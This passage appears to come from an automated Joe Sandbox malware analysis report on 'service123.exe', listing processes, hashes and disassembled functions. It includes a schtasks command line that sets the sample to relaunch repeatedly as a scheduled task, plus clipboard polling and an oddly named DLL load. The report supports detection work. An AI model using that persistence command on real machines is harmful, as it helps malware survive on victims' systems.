Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\service123.exe"
Imagebase:	0x1c0000
File size:	314'617'856 bytes
MD5 hash:	110FE44D33E426703CD712E879D34CBC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	04:06:28
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user~1\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Imagebase:	0xe80000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	04:06:28
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	04:06:28
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 1200
Imagebase:	0x810000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	04:06:31
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\/service123.exe
Imagebase:	0x1c0000
File size:	314'617'856 bytes
MD5 hash:	110FE44D33E426703CD712E879D34CBC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	04:07:03
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\/service123.exe
Imagebase:	0x1c0000
File size:	314'617'856 bytes
MD5 hash:	110FE44D33E426703CD712E879D34CBC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	04:08:02
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\/service123.exe
Imagebase:	0x1c0000
File size:	314'617'856 bytes
MD5 hash:	110FE44D33E426703CD712E879D34CBC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	04:09:02
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\/service123.exe
Imagebase:	0x1c0000
File size:	314'617'856 bytes
MD5 hash:	110FE44D33E426703CD712E879D34CBC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	50.4%
Total number of Nodes:	125
Total number of Limit Nodes:	4

Executed Functions

Function 001C116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 001C11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 001C1238
__p__acmdln.MSVCRT ref: 001C1261
malloc.MSVCRT ref: 001C12EB
strlen.MSVCRT ref: 001C1323
malloc.MSVCRT ref: 001C132E
memcpy.MSVCRT ref: 001C1344
GetStartupInfoA.KERNEL32 ref: 001C1433

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: 78fa6899aff739ae0760963137cd685e52f9ce43e1c510ead184892d8cf6510f
Instruction ID: 33c00664aaa524bd2ce439f0dabbc3e909fa0b345405320a338cab9963eeb303
Opcode Fuzzy Hash: 78fa6899aff739ae0760963137cd685e52f9ce43e1c510ead184892d8cf6510f
Instruction Fuzzy Hash: 8381BEB19043009FDB10EFA8E884F6DBBE1FB66304F15452CE9859B712D775D89ACB82

Function 001C15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 001C15CD
_exit.MSVCRT ref: 001C161A
_write.MSVCRT ref: 001C166A
_close.MSVCRT ref: 001C1679

Strings

@, xrefs: 001C8341
terminated, xrefs: 001C1640
CONOUT$, xrefs: 001C15C6

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: c346682978563c308e2f546ce832dafcb660df5940988199dda248ca402d9bac
Instruction ID: b4152de66f7cb871139d34a71dd2d2813b13f11882fa32d1e07238939b309031
Opcode Fuzzy Hash: c346682978563c308e2f546ce832dafcb660df5940988199dda248ca402d9bac
Instruction Fuzzy Hash: 354135B09083049FDB00EFB8C984B6EBBE4BBA4304F04892DE899D7251E778D855CB52

Function 6C9C14B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 6C9C14CD
_exit.MSVCRT ref: 6C9C151A
_write.MSVCRT ref: 6C9C156A
_close.MSVCRT ref: 6C9C1579

Strings

terminated, xrefs: 6C9C1540
@, xrefs: 6CA94AB1
CONOUT$, xrefs: 6C9C14C6

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: 73a85b0aa1ce2c5ddc4ebf4024b02056a2203f476374d0798c40a8e35db92231
Instruction ID: b9cf7c243c0fcc02707a14a77f20fa079498c263386c6e9c00c49366c85509a9
Opcode Fuzzy Hash: 73a85b0aa1ce2c5ddc4ebf4024b02056a2203f476374d0798c40a8e35db92231
Instruction Fuzzy Hash: 884159B0A183058FDB40DFB9C44569EBBF4AF4A318F11CA2DE8A9E7640E734D445CB5A

Function 6C9D9C22 Relevance: 15.1, APIs: 10, Instructions: 110
sleepclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6C9D9EB0: GetClipboardSequenceNumber.USER32 ref: 6C9D9EBE

Sleep.KERNELBASE ref: 6C9D9BFF
GetClipboardSequenceNumber.USER32 ref: 6C9D9C08

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: ClipboardNumberSequence$Sleep
String ID:
API String ID: 2948009381-0
Opcode ID: f0f7547f8e3d6f8e6a262e08424b7269a1dfdeff056d05cb1b1022407a473951
Instruction ID: 34782a5f53634034792a17162b7dfdfee8294e64f58afd52c3643b4c7c9bf505
Opcode Fuzzy Hash: f0f7547f8e3d6f8e6a262e08424b7269a1dfdeff056d05cb1b1022407a473951
Instruction Fuzzy Hash: B2410DB15097028FDB04FF74D29859DBBF4AF55208F42892CE89697640EF34E54ECB92

Function 001C81E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 87
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,001C138E,?,?,00006EA2,001C138E), ref: 001C8271
GetProcAddress.KERNEL32 ref: 001C828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,001C138E,?,?,00006EA2,001C138E), ref: 001C829D

Strings

Failed to get function address. Error code: %d, xrefs: 001C82E0
ehoYPkfWhVokJMBQVokJMBQaExv.dll, xrefs: 001C824A
NKUGaMdqDCBMAQCywoWm, xrefs: 001C827E

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Failed to get function address. Error code: %d$NKUGaMdqDCBMAQCywoWm$ehoYPkfWhVokJMBQVokJMBQaExv.dll
API String ID: 145871493-3680983564
Opcode ID: e4fc6f22c443b38b6d8b931dd74ab65286ea023df7549df0dda4faca34fa82bf
Instruction ID: b99e5e1ad58a09634ce21486c896d08064178945eebaeb4e65d10878178a3efb
Opcode Fuzzy Hash: e4fc6f22c443b38b6d8b931dd74ab65286ea023df7549df0dda4faca34fa82bf
Instruction Fuzzy Hash: 27318F728086009FD700AF78EE89E9EBFF4EB65340F01892CE88593200EB75D595CB92

Function 001C8230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 90
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,001C138E,?,?,00006EA2,001C138E), ref: 001C8271
GetProcAddress.KERNEL32 ref: 001C828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,001C138E,?,?,00006EA2,001C138E), ref: 001C829D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,001C138E,?,?,00006EA2,001C138E), ref: 001C82BD
GetLastError.KERNEL32 ref: 001C82DA
FreeLibrary.KERNEL32 ref: 001C82F3

Strings

Failed to load DLL. Error code: %d, xrefs: 001C82C3
ehoYPkfWhVokJMBQVokJMBQaExv.dll, xrefs: 001C824A
NKUGaMdqDCBMAQCywoWm, xrefs: 001C827E

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: Library$ErrorFreeLast$AddressLoadProc
String ID: Failed to load DLL. Error code: %d$NKUGaMdqDCBMAQCywoWm$ehoYPkfWhVokJMBQVokJMBQaExv.dll
API String ID: 1397630947-2919006163
Opcode ID: bc234074cc046044b00acdf0feffe391a769286bc6dc7f2a3909da936f3308c4
Instruction ID: 4193ed86b5b73a7f109f31ab13a95ac9dc92b68c25e2979b932d8dc7d277b439
Opcode Fuzzy Hash: bc234074cc046044b00acdf0feffe391a769286bc6dc7f2a3909da936f3308c4
Instruction Fuzzy Hash: 6511DF729046009FD700AFB8DE8AE9EBFE0EB65344F04493CE85593241EF72D561CA82

Function 001C13C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 001C1238
__p__acmdln.MSVCRT ref: 001C1261
malloc.MSVCRT ref: 001C12EB
strlen.MSVCRT ref: 001C1323
malloc.MSVCRT ref: 001C132E
memcpy.MSVCRT ref: 001C1344
_amsg_exit.MSVCRT ref: 001C13EA
_initterm.MSVCRT ref: 001C140C

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2053141405-0
Opcode ID: c645fce9192aec46db4a49dd9f3b831696e1558bacf52d6ed54c5e53817f2062
Instruction ID: 723ed3900a309d0ea6b6a7265b5449a518e2d84387ab46dfd2ace7c3541ee322
Opcode Fuzzy Hash: c645fce9192aec46db4a49dd9f3b831696e1558bacf52d6ed54c5e53817f2062
Instruction Fuzzy Hash: 2F4136B49043019FDB10EF68E980B5DBBF1BB65300F11452DE98597712DB74E8A6CF82

Function 001C11A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 001C11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 001C1238
__p__acmdln.MSVCRT ref: 001C1261
malloc.MSVCRT ref: 001C12EB
strlen.MSVCRT ref: 001C1323
malloc.MSVCRT ref: 001C132E
memcpy.MSVCRT ref: 001C1344
_amsg_exit.MSVCRT ref: 001C13EA
_initterm.MSVCRT ref: 001C140C

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2230096795-0
Opcode ID: a14bb235dae5d2802bf4b914e7a21348c3650ff1a0c67160ee70b083008c7abd
Instruction ID: ae325aa96287e777520cd8b830e2cc209aca4208d1bc80a0b581d0271da3bdd3
Opcode Fuzzy Hash: a14bb235dae5d2802bf4b914e7a21348c3650ff1a0c67160ee70b083008c7abd
Instruction Fuzzy Hash: 954139B0A443019FDB10EF68E884B5DBBF0BB65344F14452DE8859B752D774D896CF82

Function 001C1160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 001C11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 001C1238
__p__acmdln.MSVCRT ref: 001C1261
malloc.MSVCRT ref: 001C12EB
strlen.MSVCRT ref: 001C1323
malloc.MSVCRT ref: 001C132E
memcpy.MSVCRT ref: 001C1344
GetStartupInfoA.KERNEL32 ref: 001C1433

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: e77447319b97cc9f8109b88dfca3ab41fe88dcfad54e7ce0d5f539f2474f0e93
Instruction ID: 233ea06f9d9aef3e49f80d88f8714c9b2071897bacc68dfb1061158c2aa80050
Opcode Fuzzy Hash: e77447319b97cc9f8109b88dfca3ab41fe88dcfad54e7ce0d5f539f2474f0e93
Instruction Fuzzy Hash: E2516AB1A043009FDB14DFA8E884F5ABBF0FB69304F15852CE9459B712D774E896CB81

Function 6C9D9B70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexA.KERNEL32 ref: 6C9D9B99
CreateMutexA.KERNELBASE ref: 6C9D9BE3
Sleep.KERNELBASE ref: 6C9D9BFF
GetClipboardSequenceNumber.USER32 ref: 6C9D9C08

Strings

uwwcACVDotPKkwKQKpzK, xrefs: 6C9D9B82, 6C9D9BCC

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: Mutex$ClipboardCreateNumberOpenSequenceSleep
String ID: uwwcACVDotPKkwKQKpzK
API String ID: 3689039344-827300870
Opcode ID: 30bf49f9be30837f7600aa73cb91d4b14121e74659158bfc5c07ab842ee113dd
Instruction ID: d628a4f62e8795b9ff85caf36c066884628b9af63291fb210cb243723d4a16fc
Opcode Fuzzy Hash: 30bf49f9be30837f7600aa73cb91d4b14121e74659158bfc5c07ab842ee113dd
Instruction Fuzzy Hash: 8701D6715183068FCB40EF78C54979BBFF4AB45345F02C81CE89896640EB74A44ACBD2

Function 001C1296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 001C12EB
strlen.MSVCRT ref: 001C1323
malloc.MSVCRT ref: 001C132E
memcpy.MSVCRT ref: 001C1344

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: b3d61bc3c88f6c04902272f3577a1c7618170cd97c0e0e6823ee51d63feca0a0
Instruction ID: 3e88ec1df1d30acca6fccccb04a88bde5f728d3f16c4a7bc4717836309a8fdcb
Opcode Fuzzy Hash: b3d61bc3c88f6c04902272f3577a1c7618170cd97c0e0e6823ee51d63feca0a0
Instruction Fuzzy Hash: E73147B59043158FCB10DF68E880B99BBF1FB69300F15852DE949A7712D735E866CF81

Function 001C13BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 001C12EB
strlen.MSVCRT ref: 001C1323
malloc.MSVCRT ref: 001C132E
memcpy.MSVCRT ref: 001C1344

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 7dc8e1d33506bb63321e4ba12565fbcef952a53d67c213811526990b72f186df
Instruction ID: ab793868fb6de700700fb119bf5080009083510cec78daf21d8e1f44a673aaa8
Opcode Fuzzy Hash: 7dc8e1d33506bb63321e4ba12565fbcef952a53d67c213811526990b72f186df
Instruction Fuzzy Hash: C121F3B59057118FCB14EF68E880A99BBF1BBA8300F11892DE948A7711D730E956CF81

Function 6C9DB3F0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9a5870b7ecdac67940057f648d381cc8e9353c357193cc4fd81ffcee704e2db
Instruction ID: 76714201db8218fb0ebf6f2ed36e60c76142a7eb82224a5a8d418b740eda0483
Opcode Fuzzy Hash: d9a5870b7ecdac67940057f648d381cc8e9353c357193cc4fd81ffcee704e2db
Instruction Fuzzy Hash: 05519EB5A297028FCB04DF1DD28151AFBF0FF95358B15865DD4589BB00EB30E885CBA2

Function 6C9DB560 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6798dce74ccd7d5bf374a059ca6e1b2fc63fbb07d37f97587c9b72daa1c9c77
Instruction ID: e4a43319507c98b589868f4ae8ab4e72594b9723495f84482172f492ce8cc1a5
Opcode Fuzzy Hash: d6798dce74ccd7d5bf374a059ca6e1b2fc63fbb07d37f97587c9b72daa1c9c77
Instruction Fuzzy Hash: 6C31C171B357018FDB049F28C6C2649B7F8BF96318B49C26CC9119BB45EB30E445CB52

Non-executed Functions

Function 6C9CCD00 Relevance: 33.4, APIs: 22, Instructions: 445stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9CCD7D

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 5035dec63dbdecc9a2dd09608b6751831aeafccfca96f2df98620c39cf3d0052
Instruction ID: 189ad82fff811b43fc4958a15bf0deaff53b2fdc0e31dc3e4b9dbaa049f24734
Opcode Fuzzy Hash: 5035dec63dbdecc9a2dd09608b6751831aeafccfca96f2df98620c39cf3d0052
Instruction Fuzzy Hash: 0802F5726487518FD700CF29C054395FFE2AF46318F1986AED8A857B91C376E949CB83

